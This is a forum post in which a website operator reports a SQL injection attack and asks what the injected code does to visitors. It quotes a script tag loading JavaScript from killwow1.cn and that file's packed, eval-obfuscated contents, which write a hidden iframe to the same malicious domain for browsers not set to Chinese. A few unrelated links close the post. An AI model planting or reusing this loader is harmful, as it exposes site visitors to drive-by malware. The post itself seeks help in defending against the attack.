|
|
A site I work on was hacked this morning. (SQL Injection, Yay )
Some javascript was injected. as follows
"<script src=http://www.killwow1.cn/g.js></script>"
when i have a look at this page it contants the code
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('9 (d.f==\'j-3\'){}5{4.h("<a e=\"8:\/\/i.c.3\/2\/b.7\" g=\"1\" 6=\"0\"><\/a> ");',62,20,'|100|cc|cn|document|else|height|htm|http|if|iframe|index|killwow1|navigator|src|systemLa nguage|width|writeln|www|zh'.split('|'),0,{}))
Could someone tell me what it would do to users of the site that would have run the script.
http://www.idomainsite.com/tags/fexon+technology+ltd/
http://www.topix.com/forum/tech/computer-security/T2K16BPEFFBRQTS69
http://hi.baidu.com/msdes
|
|
|
|
|
|
|
|
foxon177
